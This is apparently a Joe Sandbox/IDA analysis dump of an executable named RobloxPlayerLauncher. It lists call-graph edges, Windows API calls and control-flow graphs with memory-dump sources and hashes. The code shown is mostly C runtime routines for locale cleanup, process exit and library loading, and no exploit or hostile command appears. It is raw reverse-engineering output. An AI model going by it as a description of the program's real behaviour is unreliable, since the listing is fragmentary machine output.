2474->2473 2483 a199dc ___free_lconv_mon 14 API calls 2474->2483 2478 a21968 2475->2478 2479 a21928 2476->2479 2481 a218f1 2477->2481 2484 a199dc ___free_lconv_mon 14 API calls 2478->2484 2487 a199dc ___free_lconv_mon 14 API calls 2479->2487 2480 a219ef 2488 a199dc ___free_lconv_mon 14 API calls 2480->2488 2495 a20aae 2481->2495 2482 a2198f 2482->2480 2494 a199dc 14 API calls ___free_lconv_mon 2482->2494 2485 a21913 2483->2485 2486 a21976 2484->2486 2523 a20f62 2485->2523 2491 a199dc ___free_lconv_mon 14 API calls 2486->2491 2487->2469 2492 a219f5 2488->2492 2491->2493 2492->2461 2535 a21a24 2493->2535 2494->2482 2496 a20ba8 2495->2496 2497 a20abf 2495->2497 2496->2474 2498 a20ad0 2497->2498 2499 a199dc ___free_lconv_mon 14 API calls 2497->2499 2500 a20ae2 2498->2500 2502 a199dc ___free_lconv_mon 14 API calls 2498->2502 2499->2498 2501 a20af4 2500->2501 2503 a199dc ___free_lconv_mon 14 API calls 2500->2503 2504 a20b06 2501->2504 2505 a199dc ___free_lconv_mon 14 API calls 2501->2505 2502->2500 2503->2501 2506 a20b18 2504->2506 2507 a199dc ___free_lconv_mon 14 API calls 2504->2507 2505->2504 2508 a20b2a 2506->2508 2510 a199dc ___free_lconv_mon 14 API calls 2506->2510 2507->2506 2509 a20b3c 2508->2509 2511 a199dc ___free_lconv_mon 14 API calls 2508->2511 2512 a20b4e 2509->2512 2513 a199dc ___free_lconv_mon 14 API calls 2509->2513 2510->2508 2511->2509 2514 a20b60 2512->2514 2515 a199dc ___free_lconv_mon 14 API calls 2512->2515 2513->2512 2516 a20b72 2514->2516 2518 a199dc ___free_lconv_mon 14 API calls 2514->2518 2515->2514 2517 a20b84 2516->2517 2519 a199dc ___free_lconv_mon 14 API calls 2516->2519 2520 a20b96 2517->2520 2521 a199dc ___free_lconv_mon 14 API calls 2517->2521 2518->2516 2519->2517 2520->2496 2522 a199dc ___free_lconv_mon 14 API calls 2520->2522 2521->2520 2522->2496 2524 a20f6f 2523->2524 2534 a20fc7 2523->2534 2525 a20f7f 2524->2525 2526 a199dc ___free_lconv_mon 14 API calls 2524->2526 2527 a199dc ___free_lconv_mon 14 API calls 2525->2527 2531 a20f91 2525->2531 2526->2525 2527->2531 2528 a199dc ___free_lconv_mon 14 API calls 2530 a20fa3 2528->2530 2529 a20fb5 2533 a199dc ___free_lconv_mon 14 API calls 2529->2533 2529->2534 2530->2529 2532 a199dc ___free_lconv_mon 14 API calls 2530->2532 2531->2528 2531->2530 2532->2529 2533->2534 2534->2473 2536 a21a50 2535->2536 2537 a21a31 2535->2537 2536->2482 2537->2536 2541 a2147d 2537->2541 2540 a199dc ___free_lconv_mon 14 API calls 2540->2536 2542 a2148e 2541->2542 2576 a2155b 2541->2576 2577 a211dc 2542->2577 2545 a211dc ___free_lconv_mon 14 API calls 2546 a214a1 2545->2546 2547 a211dc ___free_lconv_mon 14 API calls 2546->2547 2548 a214ac 2547->2548 2549 a211dc ___free_lconv_mon 14 API calls 2548->2549 2550 a214b7 2549->2550 2551 a211dc ___free_lconv_mon 14 API calls 2550->2551 2552 a214c5 2551->2552 2553 a199dc ___free_lconv_mon 14 API calls 2552->2553 2554 a214d0 2553->2554 2555 a199dc ___free_lconv_mon 14 API calls 2554->2555 2556 a214db 2555->2556 2557 a199dc ___free_lconv_mon 14 API calls 2556->2557 2558 a214e6 2557->2558 2559 a211dc ___free_lconv_mon 14 API calls 2558->2559 2560 a214f4 2559->2560 2561 a211dc ___free_lconv_mon 14 API calls 2560->2561 2562 a21502 2561->2562 2563 a211dc ___free_lconv_mon 14 API calls 2562->2563 2564 a21513 2563->2564 2565 a211dc ___free_lconv_mon 14 API calls 2564->2565 2566 a21521 2565->2566 2567 a211dc ___free_lconv_mon 14 API calls 2566->2567 2568 a2152f 2567->2568 2569 a199dc ___free_lconv_mon 14 API calls 2568->2569 2570 a2153a 2569->2570 2571 a199dc ___free_lconv_mon 14 API calls 2570->2571 2572 a21545 2571->2572 2573 a199dc ___free_lconv_mon 14 API calls 2572->2573 2574 a21550 2573->2574 2575 a199dc ___free_lconv_mon 14 API calls 2574->2575 2575->2576 2576->2540 2578 a211ee 2577->2578 2579 a211fd 2578->2579 2580 a199dc ___free_lconv_mon 14 API calls 2578->2580 2579->2545 2580->2578 2581->2466 2650 a13368 2582->2650 2585 a13575 2586 a13581 ___free_lconv_mon 2585->2586 2587 a19ea5 ___free_lconv_mon 14 API calls 2586->2587 2590 a135ae 2586->2590 2593 a135a8 2586->2593 2587->2593 2588 a135f5 2589 a0424a ___free_lconv_mon 14 API calls 2588->2589 2591 a135fa 2589->2591 2592 a13621 2590->2592 2661 a1738d EnterCriticalSection 2590->2661 2594 9fb78f 43 API calls 2591->2594 2597 a13663 2592->2597 2598 a13754 2592->2598 2607 a13692 2592->2607 2593->2588 2593->2590 2615 a135df 2593->2615 2594->2615 2603 a19d54 43 API calls 2597->2603 2597->2607 2600 a1375f 2598->2600 2666 a173d5 LeaveCriticalSection 2598->2666 2602 a141bd 23 API calls 2600->2602 2612 a13767 ___free_lconv_mon 2602->2612 2605 a13687 2603->2605 2604 a19d54 43 API calls 2608 a136e7 2604->2608 2606 a19d54 43 API calls 2605->2606 2606->2607 2662 a13701 2607->2662 2614 a19d54 43 API calls 2608->2614 2608->2615 2609 a1384e 2674 a1738d EnterCriticalSection 2609->2674 2612->2609 2617 a137b9 2612->2617 2624 a137c8 2612->2624 2613 a13862 2616 a13879 SetConsoleCtrlHandler 2613->2616 2621 a1388a ___free_lconv_mon 2613->2621 2614->2615 2615->2370 2618 a13893 GetLastError 2616->2618 2616->2621 2619 a19ea5 ___free_lconv_mon 14 API calls 2617->2619 2617->2624 2675 a04237 2618->2675 2622 a137d3 2619->2622 2678 a13905 2621->2678 2622->2624 2667 a1a2f8 2622->2667 2626 a13819 2624->2626 2681 a134ff 2624->2681 2626->2370 2628 9fb5af 2627->2628 2629 9fb5db IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 2628->2629 2630 9fb6ac 2629->2630 2687 9e15fd 2630->2687 2632 9fb6ca 2632->2373 2695 a14024 2633->2695 2772 9fb6db 2636->2772 2640 a1520b 2639->2640 2642 a15232 2640->2642 2835 a1562b 2640->2835 2643 a15275 2642->2643 2644 a15250 2642->2644 2847 a15921 2643->2847 2839 a15950 2644->2839 2647 a15270 2648 9e15fd _ValidateLocalCookies 5 API calls 2647->2648 2649 a15299 2648->2649 2649->2383 2651 a13374 ___free_lconv_mon 2650->2651 2656 a1738d EnterCriticalSection 2651->2656 2653 a13382 2657 a133c0 2653->2657 2656->2653 2660 a173d5 LeaveCriticalSection 2657->2660 2659 a053cb 2659->2370 2659->2585 2660->2659 2661->2592 2663 a13707 2662->2663 2664 a136d8 2662->2664 2685 a173d5 LeaveCriticalSection 2663->2685 2664->2604 2664->2608 2664->2615 2666->2600 2668 a1a336 2667->2668 2672 a1a306 ___free_lconv_mon 2667->2672 2670 a0424a ___free_lconv_mon 14 API calls 2668->2670 2669 a1a321 RtlAllocateHeap 2671 a1a334 2669->2671 2669->2672 2670->2671 2671->2624 2672->2668 2672->2669 2673 a20a25 ___free_lconv_mon 2 API calls 2672->2673 2673->2672 2674->2613 2676 a19ea5 ___free_lconv_mon 14 API calls 2675->2676 2677 a0423c 2676->2677 2677->2621 2686 a173d5 LeaveCriticalSection 2678->2686 2680 a1390c 2680->2624 2682 a13525 2681->2682 2683 a1350c 2681->2683 2682->2626 2683->2682 2684 a0424a ___free_lconv_mon 14 API calls 2683->2684 2684->2682 2685->2664 2686->2680 2688 9e1606 IsProcessorFeaturePresent 2687->2688 2689 9e1605 2687->2689 2691 9e1648 2688->2691 2689->2632 2694 9e160b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2691->2694 2693 9e172b 2693->2632 2694->2693 2696 a14051 2695->2696 2697 a14063 2695->2697 2722 9e1b8b GetModuleHandleW 2696->2722 2707 a13eec 2697->2707 2702 a05409 2702->2378 2702->2382 2705 a140b5 2708 a13ef8 ___free_lconv_mon 2707->2708 2730 a1738d EnterCriticalSection 2708->2730 2710 a13f02 2731 a13f39 2710->2731 2712 a13f0f 2735 a13f2d 2712->2735 2715 a140bb 2760 a140ec 2715->2760 2718 a140d9 2720 a1410e 3 API calls 2718->2720 2719 a140c9 GetCurrentProcess TerminateProcess 2719->2718 2721 a140e1 ExitProcess 2720->2721 2723 9e1b97 2722->2723 2723->2697 2724 a1410e GetModuleHandleExW 2723->2724 2725 a1414d GetProcAddress 2724->2725 2726 a1416e 2724->2726 2725->2726 2729 a14161 2725->2729 2727 a14174 FreeLibrary 2726->2727 2728 a14062 2726->2728 2727->2728 2728->2697 2729->2726 2730->2710 2732 a13f45 ___free_lconv_mon 2731->2732 2734 a13fac 2732->2734 2738 a14fc7 2732->2738 2734->2712 2759 a173d5 LeaveCriticalSection 2735->2759 2737 a13f1b 2737->2702 2737->2715 2739 a14fd3 __EH_prolog3 2738->2739 2742 a14d1f 2739->2742 2741 a14ffa 2741->2734 2743 a14d2b ___free_lconv_mon 2742->2743 2750 a1738d EnterCriticalSection 2743->2750 2745 a14d39 2751 a14ed7 2745->2751 2750->2745 2752 a14ef6 2751->2752 2753 a14d46 2751->2753 2752->2753 2754 a199dc ___free_lconv_mon 14 API calls 2752->2754 2755 a14d6e 2753->2755 2754->2753 2758 a173d5 LeaveCriticalSection 2755->2758 2757 a14d57 2757->2741 2758->2757 2759->2737 2765 a1ccf5 GetPEB 2760->2765 2763 a140f6 GetPEB 2764 a140c5 2763->2764 2764->2718 2764->2719 2766 a1cd0f 2765->2766 2767 a140f1 2765->2767 2769 a1a6d3 2766->2769 2767->2763 2767->2764 2770 a1a650 ___free_lconv_mon 5 API calls 2769->2770 2771 a1a6ef 2770->2771 2771->2767 2773 9fb6ed 2772->2773 2778 9fb712 2773->2778 2775 9fb705 2789 9fb4cb 2775->2789 2779 9fb729 2778->2779 2780 9fb722 2778->2780 2785 9fb737 2779->2785 2799 9fb507 2779->2799 2795 9fb530 GetLastError 2780->2795 2783 9fb75e 2783->2785 2802 9fb7bc IsProcessorFeaturePresent 2783->2802 2785->2775 2786 9fb78e 2787 9fb6db 45 API calls 2786->2787 2788 9fb79b 2787->2788 2788->2775 2790 9fb4d7 2789->2790 2792 9fb4ee 2790->2792 2828 9fb576 2790->2828 2793 9fb576 45 API calls 2792->2793 2794 9fb501 2792->2794 2793->2794 2794->2383 2796 9fb549 2795->2796 2806 a19f56 2796->2806 2800 9fb52b 2799->2800 2801 9fb512 GetLastError SetLastError 2799->2801 2800->2783 2801->2783 2803 9fb7c8 2802->2803 2804 9fb593 8 API calls 2803->2804 2805 9fb7dd GetCurrentProcess TerminateProcess 2804->2805 2805->2786 2807 a19f69 2806->2807 2810 a19f6f 2806->2810 2808 a1a8a1 ___free_lconv_mon 6 API calls 2807->2808 2808->2810 2809 a1a8e0 ___free_lconv_mon 6 API calls 2812 a19f89 2809->2812 2810->2809 2811 9fb561 SetLastError 2810->2811 2811->2779 2812->2811 2813 a1a29b ___free_lconv_mon 14 API calls 2812->2813 2814 a19f99 2813->2814 2815 a19fa1 2814->2815 2816 a19fb6 2814->2816 2818 a1a8e0 ___free_lconv_mon 6 API calls 2815->2818 2817 a1a8e0 ___free_lconv_mon 6 API calls 2816->2817 2819 a19fc2 2817->2819 2820 a19fad 2818->2820 2821 a19fd5 2819->2821 2822 a19fc6 2819->2822 2823 a199dc ___free_lconv_mon 14 API calls 2820->2823 2825 a19b82 ___free_lconv_mon 14 API calls 2821->2825 2824 a1a8e0 ___free_lconv_mon 6 API calls 2822->2824 2823->2811 2824->2820 2826 a19fe0 2825->2826 2827 a199dc ___free_lconv_mon 14 API calls 2826->2827 2827->2811 2829 9fb589 2828->2829 2830 9fb580 2828->2830 2829->2792 2831 9fb530 16 API calls 2830->2831 2832 9fb585 2831->2832 2832->2829 2833 a053c6 45 API calls 2832->2833 2834 9fb592 2833->2834 2836 a15656 2835->2836 2837 a1584f RaiseException 2836->2837 2838 a15868 2837->2838 2838->2642 2840 a1595d 2839->2840 2841 a1596c 2840->2841 2843 a1599b 2840->2843 2842 a15921 14 API calls 2841->2842 2844 a15985 2842->2844 2845 a159e9 2843->2845 2846 a15921 14 API calls 2843->2846 2844->2647 2845->2647 2846->2845 2848 a15943 2847->2848 2850 a1592e 2847->2850 2849 a0424a ___free_lconv_mon 14 API calls 2848->2849 2851 a15948 2849->2851 2850->2851 2852 a0424a ___free_lconv_mon 14 API calls 2850->2852 2851->2647 2853 a1593b 2852->2853 2853->2647 2855 a1a650 ___free_lconv_mon 5 API calls 2854->2855 2856 a1a72f 2855->2856 2856->2326 2858 a19ea5 ___free_lconv_mon 14 API calls 2857->2858 2860 a055c4 2858->2860 2859 a05606 ExitThread 2860->2859 2861 a055dd 2860->2861 2866 a1abc4 2860->2866 2863 a055f0 2861->2863 2864 a055e9 CloseHandle 2861->2864 2863->2859 2865 a055fc FreeLibraryAndExitThread 2863->2865 2864->2863 2865->2859 2867 a1a650 ___free_lconv_mon 5 API calls 2866->2867 2868 a1abdd 2867->2868 2868->2861 2869 9e5039 2870 9e5043 2869->2870 2872 9e5054 2869->2872 2870->2872 2873 9fb468 2870->2873 2874 a199dc ___free_lconv_mon 14 API calls 2873->2874 2875 9fb480 2874->2875 2875->2872 2876 a1a2f8 2877 a1a336 2876->2877 2881 a1a306 ___free_lconv_mon 2876->2881 2879 a0424a ___free_lconv_mon 14 API calls 2877->2879 2878 a1a321 RtlAllocateHeap 2880 a1a334 2878->2880 2878->2881 2879->2880 2881->2877 2881->2878 2882 a20a25 ___free_lconv_mon 2 API calls 2881->2882 2882->2881 2894 a133eb 2895 a133f7 ___free_lconv_mon 2894->2895 2900 a1738d EnterCriticalSection 2895->2900 2897 a13406 2901 a13466 2897->2901 2900->2897 2904 a173d5 LeaveCriticalSection 2901->2904 2903 a13458 2904->2903 2905 a3d7c8 2906 9e15fd _ValidateLocalCookies 5 API calls 2905->2906 2907 a3d7db 2906->2907 2883 a141bd 2884 a14024 23 API calls 2883->2884 2885 a141ce 2884->2885 2908 9e0ed2 2911 9e1cd2 2908->2911 2910 9e0ed7 2910->2910 2912 9e1ce8 2911->2912 2913 9e1cf1 2912->2913 2915 9e1c85 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2912->2915 2913->2910 2915->2913 2916 9f8b30 2917 9f8b4e 2916->2917 2930 9f8af0 2917->2930 2931 9f8b0f 2930->2931 2932 9f8b02 2930->2932 2933 9e15fd _ValidateLocalCookies 5 API calls 2932->2933 2933->2931 2934 9fb140 2935 9fb152 2934->2935 2937 9fb160 2934->2937 2936 9e15fd _ValidateLocalCookies 5 API calls 2935->2936 2936->2937

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 165 a1ccb1-a1ccc1 166 a1ccf0-a1ccf4 165->166 167 a1ccc3-a1ccd4 GetPEB 165->167 168 a1cce7-a1ccee 167->168 169 a1ccd6-a1ccda call a1a713 167->169 168->166 171 a1ccdf-a1cce2 169->171 171->168 172 a1cce4-a1cce6 171->172 172->168
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10da144da914dd2faf3d421d28ef601c0b9e7735ef28dcfe1e59c1eefae066f2
              • Instruction ID: d809036d1e58cc50aa8b382f9fa9d4f6df48fdc21bcbd55c9ce59e807c5a5e3d
              • Opcode Fuzzy Hash: 10da144da914dd2faf3d421d28ef601c0b9e7735ef28dcfe1e59c1eefae066f2
              • Instruction Fuzzy Hash: 38F06D32A61224EBCB26DB4CC505A9973BCEB45B65F110096F505EB241C2B0DE80C7D0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 a1a585-a1a591 1 a1a623-a1a626 0->1 2 a1a596-a1a5a7 1->2 3 a1a62c 1->3 5 a1a5b4-a1a5cd LoadLibraryExW 2->5 6 a1a5a9-a1a5ac 2->6 4 a1a62e-a1a632 3->4 9 a1a633-a1a643 5->9 10 a1a5cf-a1a5d8 GetLastError 5->10 7 a1a5b2 6->7 8 a1a64c-a1a64e 6->8 12 a1a620 7->12 8->4 9->8 11 a1a645-a1a646 FreeLibrary 9->11 13 a1a611-a1a61e 10->13 14 a1a5da-a1a5ec call a05ef7 10->14 11->8 12->1 13->12 14->13 17 a1a5ee-a1a600 call a05ef7 14->17 17->13 20 a1a602-a1a60f LoadLibraryExW 17->20 20->9 20->13
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6AE65F7C,?,00A1A692,?,?,?,00000000), ref: 00A1A646
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction ID: ef4435954a3024d8cb022ce834c76369283fce7908d7cdc0cd6769256ebdd45a
              • Opcode Fuzzy Hash: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction Fuzzy Hash: 0E213D76E06210ABCB329B64EC40ADB7BADDF51370F180120F815A72D1DB30ED41C6D1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 21 a055b9-a055c6 call a19ea5 24 a05606-a05609 ExitThread 21->24 25 a055c8-a055d0 21->25 25->24 26 a055d2-a055d6 25->26 27 a055d8 call a1abc4 26->27 28 a055dd-a055e3 26->28 27->28 30 a055f0-a055f6 28->30 31 a055e5-a055e7 28->31 30->24 32 a055f8-a055fa 30->32 31->30 33 a055e9-a055ea CloseHandle 31->33 32->24 34 a055fc-a05600 FreeLibraryAndExitThread 32->34 33->30 34->24
              APIs
                • Part of subcall function 00A19EA5: GetLastError.KERNEL32(00000000,?,00A0424F,00A1A2ED,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A19EA9
                • Part of subcall function 00A19EA5: SetLastError.KERNEL32(00000000), ref: 00A19F4B
              • CloseHandle.KERNEL32(?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A055EA
              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A05600
              • ExitThread.KERNEL32 ref: 00A05609
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
              • String ID:
              • API String ID: 1991824761-0
              • Opcode ID: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction ID: 5409e56de043acacab75a453b86ffadee238170dee6c38dd643b79a99aaccb91
              • Opcode Fuzzy Hash: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
